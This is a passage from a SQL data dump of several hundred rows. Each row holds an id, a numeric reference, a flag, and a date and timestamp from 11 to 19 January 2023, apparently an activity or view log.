06:29:00'),(67817,5062,1,'2023-01-11','2023-01-11 06:34:31'),(67818,3090,1,'2023-01-11','2023-01-11 07:15:15'),(67819,1592,1,'2023-01-11','2023-01-11 08:00:14'),(67820,80,1,'2023-01-11','2023-01-11 08:12:45'),(67821,1582,1,'2023-01-11','2023-01-11 08:45:14'),(67822,570,1,'2023-01-11','2023-01-11 10:08:47'),(67823,570,1,'2023-01-11','2023-01-11 10:11:22'),(67824,1582,1,'2023-01-11','2023-01-11 10:47:54'),(67825,2769,1,'2023-01-11','2023-01-11 11:08:27'),(67826,1594,1,'2023-01-11','2023-01-11 11:23:00'),(67827,1594,1,'2023-01-11','2023-01-11 11:35:17'),(67828,76,1,'2023-01-11','2023-01-11 11:36:56'),(67829,474,1,'2023-01-11','2023-01-11 11:58:44'),(67830,80,1,'2023-01-11','2023-01-11 12:02:39'),(67831,2769,1,'2023-01-11','2023-01-11 12:06:29'),(67832,4618,1,'2023-01-11','2023-01-11 12:17:39'),(67833,5163,1,'2023-01-11','2023-01-11 12:20:35'),(67834,1610,1,'2023-01-11','2023-01-11 12:32:54'),(67835,4960,1,'2023-01-11','2023-01-11 13:00:34'),(67836,2809,1,'2023-01-11','2023-01-11 13:01:04'),(67837,4436,1,'2023-01-11','2023-01-11 13:23:59'),(67838,4911,1,'2023-01-11','2023-01-11 13:32:26'),(67839,4944,1,'2023-01-11','2023-01-11 13:46:15'),(67840,468,1,'2023-01-11','2023-01-11 13:59:53'),(67841,4457,1,'2023-01-11','2023-01-11 14:18:36'),(67842,1772,1,'2023-01-11','2023-01-11 14:27:09'),(67843,2410,1,'2023-01-11','2023-01-11 15:29:02'),(67844,3313,1,'2023-01-11','2023-01-11 15:59:19'),(67845,89,1,'2023-01-11','2023-01-11 16:41:14'),(67846,4960,1,'2023-01-11','2023-01-11 16:58:13'),(67847,3102,1,'2023-01-11','2023-01-11 17:02:49'),(67848,5071,1,'2023-01-11','2023-01-11 17:53:53'),(67849,1594,1,'2023-01-11','2023-01-11 18:15:51'),(67850,4238,1,'2023-01-11','2023-01-11 18:26:10'),(67851,467,1,'2023-01-11','2023-01-11 18:46:52'),(67852,3664,1,'2023-01-11','2023-01-11 18:47:27'),(67853,2297,1,'2023-01-11','2023-01-11 18:50:13'),(67854,80,1,'2023-01-11','2023-01-11 18:50:31'),(67855,3664,1,'2023-01-11','2023-01-11 19:32:24'),(67856,3097,1,'2023-01-11','2023-01-11 19:39:28'),(67857,4546,1,'2023-01-11','2023-01-11 20:06:56'),(67858,3664,1,'2023-01-11','2023-01-11 20:17:34'),(67859,470,1,'2023-01-11','2023-01-11 21:55:39'),(67860,1594,1,'2023-01-11','2023-01-11 22:37:35'),(67861,5116,1,'2023-01-11','2023-01-11 23:06:57'),(67862,4944,1,'2023-01-12','2023-01-12 00:21:34'),(67863,4944,1,'2023-01-12','2023-01-12 00:23:23'),(67864,1588,1,'2023-01-12','2023-01-12 00:32:25'),(67865,4457,1,'2023-01-12','2023-01-12 01:51:30'),(67866,3764,1,'2023-01-12','2023-01-12 05:02:35'),(67867,4436,1,'2023-01-12','2023-01-12 06:12:06'),(67868,5113,1,'2023-01-12','2023-01-12 06:27:55'),(67869,4971,1,'2023-01-12','2023-01-12 07:04:02'),(67870,1586,1,'2023-01-12','2023-01-12 07:44:51'),(67871,1586,1,'2023-01-12','2023-01-12 07:44:51'),(67872,1586,1,'2023-01-12','2023-01-12 07:57:07'),(67873,1582,1,'2023-01-12','2023-01-12 08:06:24'),(67874,2813,1,'2023-01-12','2023-01-12 08:29:44'),(67875,2751,1,'2023-01-12','2023-01-12 09:05:24'),(67876,3721,1,'2023-01-12','2023-01-12 09:13:26'),(67877,4448,1,'2023-01-12','2023-01-12 10:03:24'),(67878,1602,1,'2023-01-12','2023-01-12 10:13:37'),(67879,1718,1,'2023-01-12','2023-01-12 10:21:06'),(67880,5037,1,'2023-01-12','2023-01-12 10:23:48'),(67881,1614,1,'2023-01-12','2023-01-12 10:57:37'),(67882,1614,1,'2023-01-12','2023-01-12 10:58:42'),(67883,1582,1,'2023-01-12','2023-01-12 10:59:29'),(67884,1588,1,'2023-01-12','2023-01-12 11:15:00'),(67885,4960,1,'2023-01-12','2023-01-12 11:26:11'),(67886,1745,1,'2023-01-12','2023-01-12 12:06:56'),(67887,3781,1,'2023-01-12','2023-01-12 12:51:46'),(67888,5140,1,'2023-01-12','2023-01-12 13:19:06'),(67889,4966,1,'2023-01-12','2023-01-12 13:58:55'),(67890,4966,1,'2023-01-12','2023-01-12 13:58:56'),(67891,1711,1,'2023-01-12','2023-01-12 14:12:37'),(67892,1612,1,'2023-01-12','2023-01-12 14:26:45'),(67893,3731,1,'2023-01-12','2023-01-12 14:43:50'),(67894,4960,1,'2023-01-12','2023-01-12 15:06:53'),(67895,1586,1,'2023-01-12','2023-01-12 15:35:43'),(67896,1586,1,'2023-01-12','2023-01-12 15:35:48'),(67897,1586,1,'2023-01-12','2023-01-12 15:36:47'),(67898,3781,1,'2023-01-12','2023-01-12 15:46:00'),(67899,91,1,'2023-01-12','2023-01-12 15:48:16'),(67900,2801,1,'2023-01-12','2023-01-12 15:51:44'),(67901,5058,1,'2023-01-12','2023-01-12 15:52:17'),(67902,91,1,'2023-01-12','2023-01-12 15:53:09'),(67903,4591,1,'2023-01-12','2023-01-12 15:56:30'),(67904,4556,1,'2023-01-12','2023-01-12 16:18:41'),(67905,4238,1,'2023-01-12','2023-01-12 17:04:05'),(67906,91,1,'2023-01-12','2023-01-12 17:07:04'),(67907,4608,1,'2023-01-12','2023-01-12 17:08:40'),(67908,1544,1,'2023-01-12','2023-01-12 17:15:12'),(67909,1614,1,'2023-01-12','2023-01-12 17:51:07'),(67910,4888,1,'2023-01-12','2023-01-12 17:56:34'),(67911,89,1,'2023-01-12','2023-01-12 18:34:55'),(67912,72,1,'2023-01-12','2023-01-12 18:37:06'),(67913,1596,1,'2023-01-12','2023-01-12 18:39:37'),(67914,4960,1,'2023-01-12','2023-01-12 19:54:31'),(67915,1586,1,'2023-01-12','2023-01-12 21:03:56'),(67916,1734,1,'2023-01-12','2023-01-12 21:42:49'),(67917,1586,1,'2023-01-12','2023-01-12 21:52:26'),(67918,469,1,'2023-01-12','2023-01-12 21:56:29'),(67919,1768,1,'2023-01-12','2023-01-12 22:15:40'),(67920,470,1,'2023-01-12','2023-01-12 22:19:59'),(67921,80,1,'2023-01-12','2023-01-12 22:25:52'),(67922,4980,1,'2023-01-12','2023-01-12 23:09:02'),(67923,4485,1,'2023-01-12','2023-01-12 23:14:35'),(67924,335,1,'2023-01-12','2023-01-12 23:19:35'),(67925,4485,1,'2023-01-12','2023-01-12 23:38:50'),(67926,3090,1,'2023-01-12','2023-01-12 23:52:27'),(67927,4738,1,'2023-01-13','2023-01-13 00:31:39'),(67928,4938,1,'2023-01-13','2023-01-13 00:59:30'),(67929,4938,1,'2023-01-13','2023-01-13 01:04:15'),(67930,4938,1,'2023-01-13','2023-01-13 01:04:41'),(67931,3087,1,'2023-01-13','2023-01-13 01:14:13'),(67932,1544,1,'2023-01-13','2023-01-13 03:14:45'),(67933,3030,1,'2023-01-13','2023-01-13 03:14:49'),(67934,1586,1,'2023-01-13','2023-01-13 03:41:07'),(67935,3069,1,'2023-01-13','2023-01-13 04:14:52'),(67936,3781,1,'2023-01-13','2023-01-13 04:44:44'),(67937,4457,1,'2023-01-13','2023-01-13 04:57:47'),(67938,3486,1,'2023-01-13','2023-01-13 06:22:09'),(67939,470,1,'2023-01-13','2023-01-13 06:49:51'),(67940,2751,1,'2023-01-13','2023-01-13 07:39:22'),(67941,4963,1,'2023-01-13','2023-01-13 10:21:29'),(67942,3004,1,'2023-01-13','2023-01-13 10:53:05'),(67943,4960,1,'2023-01-13','2023-01-13 12:26:55'),(67944,1604,1,'2023-01-13','2023-01-13 13:05:04'),(67945,68,1,'2023-01-13','2023-01-13 13:06:19'),(67946,1604,1,'2023-01-13','2023-01-13 13:11:52'),(67947,4391,1,'2023-01-13','2023-01-13 13:53:29'),(67948,4391,1,'2023-01-13','2023-01-13 14:04:43'),(67949,91,1,'2023-01-13','2023-01-13 14:52:15'),(67950,2165,1,'2023-01-13','2023-01-13 14:54:47'),(67951,1614,1,'2023-01-13','2023-01-13 15:11:41'),(67952,4412,1,'2023-01-13','2023-01-13 15:21:48'),(67953,5109,1,'2023-01-13','2023-01-13 15:45:08'),(67954,80,1,'2023-01-13','2023-01-13 15:46:52'),(67955,1872,1,'2023-01-13','2023-01-13 16:14:40'),(67956,3004,1,'2023-01-13','2023-01-13 16:25:24'),(67957,3069,1,'2023-01-13','2023-01-13 16:25:59'),(67958,89,1,'2023-01-13','2023-01-13 16:41:32'),(67959,4357,1,'2023-01-13','2023-01-13 17:24:08'),(67960,1602,1,'2023-01-13','2023-01-13 17:27:57'),(67961,1602,1,'2023-01-13','2023-01-13 17:28:08'),(67962,4944,1,'2023-01-13','2023-01-13 17:54:11'),(67963,1728,1,'2023-01-13','2023-01-13 19:09:05'),(67964,3069,1,'2023-01-13','2023-01-13 19:55:51'),(67965,1602,1,'2023-01-13','2023-01-13 20:23:29'),(67966,1602,1,'2023-01-13','2023-01-13 20:23:36'),(67967,3781,1,'2023-01-13','2023-01-13 20:31:59'),(67968,3781,1,'2023-01-13','2023-01-13 20:33:03'),(67969,1602,1,'2023-01-13','2023-01-13 21:03:47'),(67970,3102,1,'2023-01-13','2023-01-13 21:22:45'),(67971,4612,1,'2023-01-13','2023-01-13 21:26:43'),(67972,80,1,'2023-01-13','2023-01-13 21:59:35'),(67973,5140,1,'2023-01-13','2023-01-13 22:19:27'),(67974,1586,1,'2023-01-13','2023-01-13 22:33:22'),(67975,2748,1,'2023-01-13','2023-01-13 23:05:02'),(67976,4323,1,'2023-01-13','2023-01-13 23:48:49'),(67977,1728,1,'2023-01-14','2023-01-14 00:55:07'),(67978,1602,1,'2023-01-14','2023-01-14 01:11:17'),(67979,1602,1,'2023-01-14','2023-01-14 01:11:18'),(67980,1602,1,'2023-01-14','2023-01-14 01:23:22'),(67981,91,1,'2023-01-14','2023-01-14 02:28:21'),(67982,1877,1,'2023-01-14','2023-01-14 02:56:49'),(67983,4566,1,'2023-01-14','2023-01-14 05:00:33'),(67984,3092,1,'2023-01-14','2023-01-14 05:03:57'),(67985,4542,1,'2023-01-14','2023-01-14 05:06:50'),(67986,1728,1,'2023-01-14','2023-01-14 05:22:02'),(67987,1582,1,'2023-01-14','2023-01-14 06:43:14'),(67988,3038,1,'2023-01-14','2023-01-14 07:50:15'),(67989,1592,1,'2023-01-14','2023-01-14 08:19:26'),(67990,1592,1,'2023-01-14','2023-01-14 08:19:28'),(67991,2904,1,'2023-01-14','2023-01-14 09:35:00'),(67992,4457,1,'2023-01-14','2023-01-14 09:58:29'),(67993,1586,1,'2023-01-14','2023-01-14 10:19:36'),(67994,1586,1,'2023-01-14','2023-01-14 10:21:45'),(67995,5163,1,'2023-01-14','2023-01-14 10:40:39'),(67996,5163,1,'2023-01-14','2023-01-14 10:42:05'),(67997,5163,1,'2023-01-14','2023-01-14 10:46:41'),(67998,2410,1,'2023-01-14','2023-01-14 13:18:21'),(67999,3102,1,'2023-01-14','2023-01-14 13:56:42'),(68000,469,1,'2023-01-14','2023-01-14 14:16:52'),(68001,91,1,'2023-01-14','2023-01-14 14:20:30'),(68002,2457,1,'2023-01-14','2023-01-14 14:47:47'),(68003,4944,1,'2023-01-14','2023-01-14 14:52:54'),(68004,4551,1,'2023-01-14','2023-01-14 15:01:05'),(68005,2410,1,'2023-01-14','2023-01-14 15:24:00'),(68006,3127,1,'2023-01-14','2023-01-14 15:40:20'),(68007,4944,1,'2023-01-14','2023-01-14 16:20:51'),(68008,4608,1,'2023-01-14','2023-01-14 16:22:21'),(68009,4685,1,'2023-01-14','2023-01-14 16:32:07'),(68010,4542,1,'2023-01-14','2023-01-14 16:35:40'),(68011,87,1,'2023-01-14','2023-01-14 16:39:05'),(68012,335,1,'2023-01-14','2023-01-14 16:56:41'),(68013,5140,1,'2023-01-14','2023-01-14 17:18:21'),(68014,1614,1,'2023-01-14','2023-01-14 18:24:53'),(68015,2457,1,'2023-01-14','2023-01-14 21:00:01'),(68016,4944,1,'2023-01-14','2023-01-14 21:15:48'),(68017,1588,1,'2023-01-14','2023-01-14 21:30:18'),(68018,80,1,'2023-01-14','2023-01-14 22:00:51'),(68019,2775,1,'2023-01-14','2023-01-14 23:11:51'),(68020,3102,1,'2023-01-14','2023-01-14 23:17:31'),(68021,4688,1,'2023-01-14','2023-01-14 23:42:24'),(68022,3691,1,'2023-01-14','2023-01-14 23:58:29'),(68023,3691,1,'2023-01-15','2023-01-15 00:01:21'),(68024,4674,1,'2023-01-15','2023-01-15 00:12:54'),(68025,2775,1,'2023-01-15','2023-01-15 00:16:38'),(68026,3691,1,'2023-01-15','2023-01-15 01:18:44'),(68027,4485,1,'2023-01-15','2023-01-15 01:50:49'),(68028,1590,1,'2023-01-15','2023-01-15 01:58:45'),(68029,3482,1,'2023-01-15','2023-01-15 02:28:47'),(68030,3430,1,'2023-01-15','2023-01-15 02:28:48'),(68031,3438,1,'2023-01-15','2023-01-15 02:28:51'),(68032,3498,1,'2023-01-15','2023-01-15 02:28:51'),(68033,3742,1,'2023-01-15','2023-01-15 02:28:53'),(68034,3691,1,'2023-01-15','2023-01-15 02:35:14'),(68035,3307,1,'2023-01-15','2023-01-15 02:45:43'),(68036,3041,1,'2023-01-15','2023-01-15 03:29:44'),(68037,4485,1,'2023-01-15','2023-01-15 03:45:51'),(68038,3127,1,'2023-01-15','2023-01-15 03:51:47'),(68039,3710,1,'2023-01-15','2023-01-15 04:15:03'),(68040,4323,1,'2023-01-15','2023-01-15 04:44:49'),(68041,4448,1,'2023-01-15','2023-01-15 05:13:51'),(68042,4674,1,'2023-01-15','2023-01-15 06:04:12'),(68043,3287,1,'2023-01-15','2023-01-15 06:13:27'),(68044,1544,1,'2023-01-15','2023-01-15 06:16:46'),(68045,1544,1,'2023-01-15','2023-01-15 06:16:47'),(68046,1602,1,'2023-01-15','2023-01-15 07:15:56'),(68047,4416,1,'2023-01-15','2023-01-15 07:23:07'),(68048,80,1,'2023-01-15','2023-01-15 08:11:16'),(68049,2748,1,'2023-01-15','2023-01-15 08:31:48'),(68050,4706,1,'2023-01-15','2023-01-15 08:49:32'),(68051,4341,1,'2023-01-15','2023-01-15 08:49:32'),(68052,80,1,'2023-01-15','2023-01-15 08:49:46'),(68053,4341,1,'2023-01-15','2023-01-15 08:49:49'),(68054,3285,1,'2023-01-15','2023-01-15 09:08:56'),(68055,1602,1,'2023-01-15','2023-01-15 09:51:05'),(68056,3285,1,'2023-01-15','2023-01-15 10:08:52'),(68057,3531,1,'2023-01-15','2023-01-15 10:11:57'),(68058,80,1,'2023-01-15','2023-01-15 10:36:00'),(68059,1602,1,'2023-01-15','2023-01-15 10:54:50'),(68060,3781,1,'2023-01-15','2023-01-15 11:02:52'),(68061,1588,1,'2023-01-15','2023-01-15 11:35:53'),(68062,3307,1,'2023-01-15','2023-01-15 11:56:31'),(68063,3285,1,'2023-01-15','2023-01-15 12:11:05'),(68064,3285,1,'2023-01-15','2023-01-15 12:13:14'),(68065,3006,1,'2023-01-15','2023-01-15 12:20:16'),(68066,4457,1,'2023-01-15','2023-01-15 12:56:05'),(68067,5163,1,'2023-01-15','2023-01-15 13:13:01'),(68068,68,1,'2023-01-15','2023-01-15 13:13:20'),(68069,68,1,'2023-01-15','2023-01-15 13:14:13'),(68070,80,1,'2023-01-15','2023-01-15 13:14:40'),(68071,80,1,'2023-01-15','2023-01-15 13:19:32'),(68072,68,1,'2023-01-15','2023-01-15 13:19:32'),(68073,68,1,'2023-01-15','2023-01-15 13:19:33'),(68074,5163,1,'2023-01-15','2023-01-15 13:19:34'),(68075,2297,1,'2023-01-15','2023-01-15 13:22:42'),(68076,4944,1,'2023-01-15','2023-01-15 13:44:07'),(68077,1586,1,'2023-01-15','2023-01-15 13:46:03'),(68078,1586,1,'2023-01-15','2023-01-15 13:46:05'),(68079,3781,1,'2023-01-15','2023-01-15 13:58:40'),(68080,4618,1,'2023-01-15','2023-01-15 14:59:47'),(68081,4966,1,'2023-01-15','2023-01-15 16:59:55'),(68082,3664,1,'2023-01-15','2023-01-15 16:59:57'),(68083,1606,1,'2023-01-15','2023-01-15 17:06:21'),(68084,89,1,'2023-01-15','2023-01-15 17:07:51'),(68085,1606,1,'2023-01-15','2023-01-15 17:08:36'),(68086,5140,1,'2023-01-15','2023-01-15 17:30:22'),(68087,1600,1,'2023-01-15','2023-01-15 17:41:19'),(68088,4960,1,'2023-01-15','2023-01-15 18:53:56'),(68089,2769,1,'2023-01-15','2023-01-15 18:55:43'),(68090,2769,1,'2023-01-15','2023-01-15 18:55:46'),(68091,4944,1,'2023-01-15','2023-01-15 19:54:29'),(68092,80,1,'2023-01-15','2023-01-15 19:55:00'),(68093,4944,1,'2023-01-15','2023-01-15 19:56:12'),(68094,1600,1,'2023-01-15','2023-01-15 22:45:30'),(68095,80,1,'2023-01-15','2023-01-15 22:50:33'),(68096,1600,1,'2023-01-15','2023-01-15 22:54:41'),(68097,3534,1,'2023-01-15','2023-01-15 23:31:37'),(68098,4966,1,'2023-01-15','2023-01-15 23:56:27'),(68099,3245,1,'2023-01-16','2023-01-16 03:51:46'),(68100,80,1,'2023-01-16','2023-01-16 07:36:07'),(68101,1594,1,'2023-01-16','2023-01-16 07:55:24'),(68102,1586,1,'2023-01-16','2023-01-16 08:04:23'),(68103,3083,1,'2023-01-16','2023-01-16 08:37:08'),(68104,2904,1,'2023-01-16','2023-01-16 08:37:36'),(68105,2904,1,'2023-01-16','2023-01-16 08:39:10'),(68106,1600,1,'2023-01-16','2023-01-16 08:58:37'),(68107,2309,1,'2023-01-16','2023-01-16 09:26:06'),(68108,3691,1,'2023-01-16','2023-01-16 09:59:39'),(68109,4966,1,'2023-01-16','2023-01-16 10:33:57'),(68110,3083,1,'2023-01-16','2023-01-16 11:20:51'),(68111,3083,1,'2023-01-16','2023-01-16 11:24:23'),(68112,80,1,'2023-01-16','2023-01-16 11:24:46'),(68113,4703,1,'2023-01-16','2023-01-16 11:27:24'),(68114,3083,1,'2023-01-16','2023-01-16 12:00:55'),(68115,4960,1,'2023-01-16','2023-01-16 12:04:23'),(68116,4485,1,'2023-01-16','2023-01-16 12:37:41'),(68117,3714,1,'2023-01-16','2023-01-16 12:45:40'),(68118,4750,1,'2023-01-16','2023-01-16 13:12:51'),(68119,4335,1,'2023-01-16','2023-01-16 13:43:29'),(68120,5163,1,'2023-01-16','2023-01-16 14:15:56'),(68121,4457,1,'2023-01-16','2023-01-16 14:20:36'),(68122,76,1,'2023-01-16','2023-01-16 14:21:46'),(68123,4457,1,'2023-01-16','2023-01-16 14:24:07'),(68124,4457,1,'2023-01-16','2023-01-16 14:24:33'),(68125,3006,1,'2023-01-16','2023-01-16 14:43:16'),(68126,3226,1,'2023-01-16','2023-01-16 15:09:01'),(68127,5163,1,'2023-01-16','2023-01-16 15:44:45'),(68128,5163,1,'2023-01-16','2023-01-16 17:02:46'),(68129,4966,1,'2023-01-16','2023-01-16 17:08:42'),(68130,5163,1,'2023-01-16','2023-01-16 17:13:17'),(68131,5140,1,'2023-01-16','2023-01-16 17:46:34'),(68132,2503,1,'2023-01-16','2023-01-16 18:21:19'),(68133,4960,1,'2023-01-16','2023-01-16 18:34:46'),(68134,5146,1,'2023-01-16','2023-01-16 18:41:58'),(68135,469,1,'2023-01-16','2023-01-16 19:14:58'),(68136,3438,1,'2023-01-16','2023-01-16 19:25:54'),(68137,80,1,'2023-01-16','2023-01-16 20:24:10'),(68138,4703,1,'2023-01-16','2023-01-16 20:33:01'),(68139,2617,1,'2023-01-16','2023-01-16 20:40:13'),(68140,4238,1,'2023-01-16','2023-01-16 20:49:46'),(68141,1602,1,'2023-01-16','2023-01-16 21:45:24'),(68142,2704,1,'2023-01-16','2023-01-16 22:03:09'),(68143,4960,1,'2023-01-16','2023-01-16 23:02:44'),(68144,4966,1,'2023-01-17','2023-01-17 00:18:06'),(68145,4938,1,'2023-01-17','2023-01-17 00:38:19'),(68146,4387,1,'2023-01-17','2023-01-17 01:24:25'),(68147,1598,1,'2023-01-17','2023-01-17 01:48:05'),(68148,4485,1,'2023-01-17','2023-01-17 02:59:05'),(68149,4485,1,'2023-01-17','2023-01-17 03:44:06'),(68150,4960,1,'2023-01-17','2023-01-17 03:54:39'),(68151,4960,1,'2023-01-17','2023-01-17 03:55:43'),(68152,2991,1,'2023-01-17','2023-01-17 04:06:24'),(68153,4520,1,'2023-01-17','2023-01-17 04:41:14'),(68154,1594,1,'2023-01-17','2023-01-17 05:23:10'),(68155,5163,1,'2023-01-17','2023-01-17 05:49:52'),(68156,1608,1,'2023-01-17','2023-01-17 05:58:09'),(68157,1586,1,'2023-01-17','2023-01-17 06:52:54'),(68158,481,1,'2023-01-17','2023-01-17 07:59:13'),(68159,4326,1,'2023-01-17','2023-01-17 08:15:04'),(68160,4938,1,'2023-01-17','2023-01-17 09:22:20'),(68161,4938,1,'2023-01-17','2023-01-17 09:26:29'),(68162,3781,1,'2023-01-17','2023-01-17 09:30:58'),(68163,4436,1,'2023-01-17','2023-01-17 12:33:58'),(68164,1612,1,'2023-01-17','2023-01-17 12:37:33'),(68165,4960,1,'2023-01-17','2023-01-17 12:42:24'),(68166,4960,1,'2023-01-17','2023-01-17 12:43:34'),(68167,1602,1,'2023-01-17','2023-01-17 13:01:10'),(68168,1602,1,'2023-01-17','2023-01-17 13:01:10'),(68169,1604,1,'2023-01-17','2023-01-17 13:10:04'),(68170,1584,1,'2023-01-17','2023-01-17 13:13:48'),(68171,76,1,'2023-01-17','2023-01-17 13:14:22'),(68172,1602,1,'2023-01-17','2023-01-17 13:20:29'),(68173,1722,1,'2023-01-17','2023-01-17 16:24:18'),(68174,4457,1,'2023-01-17','2023-01-17 16:47:28'),(68175,4420,1,'2023-01-17','2023-01-17 16:50:12'),(68176,472,1,'2023-01-17','2023-01-17 16:51:05'),(68177,3764,1,'2023-01-17','2023-01-17 17:00:29'),(68178,5080,1,'2023-01-17','2023-01-17 17:15:13'),(68179,1588,1,'2023-01-17','2023-01-17 17:20:24'),(68180,1724,1,'2023-01-17','2023-01-17 17:53:09'),(68181,4517,1,'2023-01-17','2023-01-17 18:57:40'),(68182,5163,1,'2023-01-17','2023-01-17 19:43:56'),(68183,1608,1,'2023-01-17','2023-01-17 19:55:21'),(68184,1586,1,'2023-01-17','2023-01-17 20:26:28'),(68185,1586,1,'2023-01-17','2023-01-17 20:26:29'),(68186,1586,1,'2023-01-17','2023-01-17 20:27:00'),(68187,1586,1,'2023-01-17','2023-01-17 22:29:31'),(68188,1586,1,'2023-01-17','2023-01-17 22:29:31'),(68189,4457,1,'2023-01-17','2023-01-17 22:42:39'),(68190,1600,1,'2023-01-17','2023-01-17 23:08:31'),(68191,1544,1,'2023-01-18','2023-01-18 00:14:09'),(68192,1596,1,'2023-01-18','2023-01-18 00:22:02'),(68193,4391,1,'2023-01-18','2023-01-18 01:01:15'),(68194,4587,1,'2023-01-18','2023-01-18 01:17:33'),(68195,4323,1,'2023-01-18','2023-01-18 01:40:06'),(68196,1614,1,'2023-01-18','2023-01-18 02:27:34'),(68197,1586,1,'2023-01-18','2023-01-18 07:00:14'),(68198,1544,1,'2023-01-18','2023-01-18 07:13:33'),(68199,1602,1,'2023-01-18','2023-01-18 07:13:51'),(68200,1586,1,'2023-01-18','2023-01-18 07:39:31'),(68201,1582,1,'2023-01-18','2023-01-18 07:54:40'),(68202,4612,1,'2023-01-18','2023-01-18 08:37:04'),(68203,1544,1,'2023-01-18','2023-01-18 08:45:00'),(68204,1586,1,'2023-01-18','2023-01-18 08:49:20'),(68205,4966,1,'2023-01-18','2023-01-18 09:03:16'),(68206,3243,1,'2023-01-18','2023-01-18 09:38:31'),(68207,91,1,'2023-01-18','2023-01-18 09:58:21'),(68208,3541,1,'2023-01-18','2023-01-18 09:59:31'),(68209,4587,1,'2023-01-18','2023-01-18 10:03:10'),(68210,5140,1,'2023-01-18','2023-01-18 10:06:57'),(68211,4870,1,'2023-01-18','2023-01-18 10:07:23'),(68212,3247,1,'2023-01-18','2023-01-18 10:23:28'),(68213,87,1,'2023-01-18','2023-01-18 10:30:12'),(68214,4963,1,'2023-01-18','2023-01-18 10:30:54'),(68215,5071,1,'2023-01-18','2023-01-18 10:31:28'),(68216,4963,1,'2023-01-18','2023-01-18 10:32:26'),(68217,1722,1,'2023-01-18','2023-01-18 10:34:58'),(68218,4612,1,'2023-01-18','2023-01-18 10:35:11'),(68219,1596,1,'2023-01-18','2023-01-18 11:08:05'),(68220,1596,1,'2023-01-18','2023-01-18 11:08:05'),(68221,1596,1,'2023-01-18','2023-01-18 11:28:23'),(68222,1610,1,'2023-01-18','2023-01-18 12:12:20'),(68223,2704,1,'2023-01-18','2023-01-18 12:36:23'),(68224,1602,1,'2023-01-18','2023-01-18 13:00:02'),(68225,1728,1,'2023-01-18','2023-01-18 13:04:42'),(68226,2309,1,'2023-01-18','2023-01-18 13:09:19'),(68227,4960,1,'2023-01-18','2023-01-18 13:13:55'),(68228,2148,1,'2023-01-18','2023-01-18 13:22:27'),(68229,1722,1,'2023-01-18','2023-01-18 13:51:08'),(68230,4412,1,'2023-01-18','2023-01-18 13:54:51'),(68231,1772,1,'2023-01-18','2023-01-18 13:58:09'),(68232,76,1,'2023-01-18','2023-01-18 14:11:39'),(68233,91,1,'2023-01-18','2023-01-18 14:13:15'),(68234,4612,1,'2023-01-18','2023-01-18 14:16:26'),(68235,91,1,'2023-01-18','2023-01-18 14:17:34'),(68236,1588,1,'2023-01-18','2023-01-18 14:27:01'),(68237,68,1,'2023-01-18','2023-01-18 14:27:40'),(68238,72,1,'2023-01-18','2023-01-18 14:29:11'),(68239,68,1,'2023-01-18','2023-01-18 14:29:53'),(68240,1588,1,'2023-01-18','2023-01-18 14:30:00'),(68241,4960,1,'2023-01-18','2023-01-18 15:02:24'),(68242,2813,1,'2023-01-18','2023-01-18 15:02:28'),(68243,1722,1,'2023-01-18','2023-01-18 15:35:02'),(68244,1588,1,'2023-01-18','2023-01-18 15:39:01'),(68245,5163,1,'2023-01-18','2023-01-18 16:17:21'),(68246,2156,1,'2023-01-18','2023-01-18 16:28:10'),(68247,2617,1,'2023-01-18','2023-01-18 16:32:21'),(68248,3066,1,'2023-01-18','2023-01-18 16:45:30'),(68249,1596,1,'2023-01-18','2023-01-18 17:15:51'),(68250,2769,1,'2023-01-18','2023-01-18 17:37:49'),(68251,2769,1,'2023-01-18','2023-01-18 17:37:50'),(68252,474,1,'2023-01-18','2023-01-18 18:02:28'),(68253,1602,1,'2023-01-18','2023-01-18 18:24:20'),(68254,1602,1,'2023-01-18','2023-01-18 18:24:24'),(68255,5140,1,'2023-01-18','2023-01-18 18:44:35'),(68256,80,1,'2023-01-18','2023-01-18 18:58:39'),(68257,68,1,'2023-01-18','2023-01-18 18:58:43'),(68258,108,1,'2023-01-18','2023-01-18 18:58:46'),(68259,1582,1,'2023-01-18','2023-01-18 19:17:30'),(68260,1588,1,'2023-01-18','2023-01-18 19:29:58'),(68261,76,1,'2023-01-18','2023-01-18 19:31:03'),(68262,335,1,'2023-01-18','2023-01-18 19:35:29'),(68263,4457,1,'2023-01-18','2023-01-18 19:35:44'),(68264,80,1,'2023-01-18','2023-01-18 19:36:28'),(68265,76,1,'2023-01-18','2023-01-18 19:40:22'),(68266,1588,1,'2023-01-18','2023-01-18 19:40:34'),(68267,3247,1,'2023-01-18','2023-01-18 20:17:21'),(68268,5163,1,'2023-01-18','2023-01-18 20:47:27'),(68269,4960,1,'2023-01-18','2023-01-18 21:05:55'),(68270,1584,1,'2023-01-18','2023-01-18 21:31:28'),(68271,4938,1,'2023-01-18','2023-01-18 21:31:50'),(68272,4960,1,'2023-01-18','2023-01-18 22:17:06'),(68273,4911,1,'2023-01-18','2023-01-18 22:34:06'),(68274,1747,1,'2023-01-18','2023-01-18 23:17:36'),(68275,3102,1,'2023-01-18','2023-01-18 23:54:22'),(68276,4706,1,'2023-01-19','2023-01-19 00:17:44'),(68277,4697,1,'2023-01-19','2023-01-19 00:48:52'),(68278,87,1,'2023-01-19','2023-01-19 01:35:23'),(68279,5253,1,'2023-01-19','2023-01-19 01:42:33'),(68280,3253,1,'2023-01-19','2023-01-19 01:47:26'),(68281,3006,1,'2023-01-19','2023-01-19 02:15:36'),(68282,1774,1,'2023-01-19','2023-01-19 02:55:21'),(68283,4485,1,'2023-01-19','2023-01-19 03:17:23'),(68284,4420,1,'2023-01-19','2023-01-19 03:17:29'),(68285,474,1,'2023-01-19','2023-01-19 03:37:21'),(68286,4485,1,'2023-01-19','2023-01-19 04:47:45'),(68287,1598,1,'2023-01-19','2023-01-19 06:07:08'),(68288,4768,1,'2023-01-19','2023-01-19 06:38:43'),(68289,4529,1,'2023-01-19','2023-01-19 07:09:38'),(68290,4709,1,'2023-01-19','2023-01-19 07:41:36'),(68291,3175,1,'2023-01-19','2023-01-19 08:56:55'),(68292,469,1,'2023-01-19','2023-01-19 09:13:45'),(68293,1598,1,'2023-01-19','2023-01-19 10:36:23'),(68294,4963,1,'2023-01-19','2023-01-19 10:49:04'),(68295,3781,1,'2023-01-19','2023-01-19 11:23:08'),(68296,4966,1,'2023-01-19','2023-01-19 11:56:22'),(68297,467,1,'2023-01-19','2023-01-19 11:57:49'),(68298,1612,1,'2023-01-19','2023-01-19 13:23:30'),(68299,1544,1,'2023-01-19','2023-01-19 14:16:37'),(68300,1614,1,'2023-01-19','2023-01-19 14:17:17'),(68301,4911,1,'2023-01-19','2023-01-19 15:24:16'),(68302,4911,1,'2023-01-19','2023-01-19 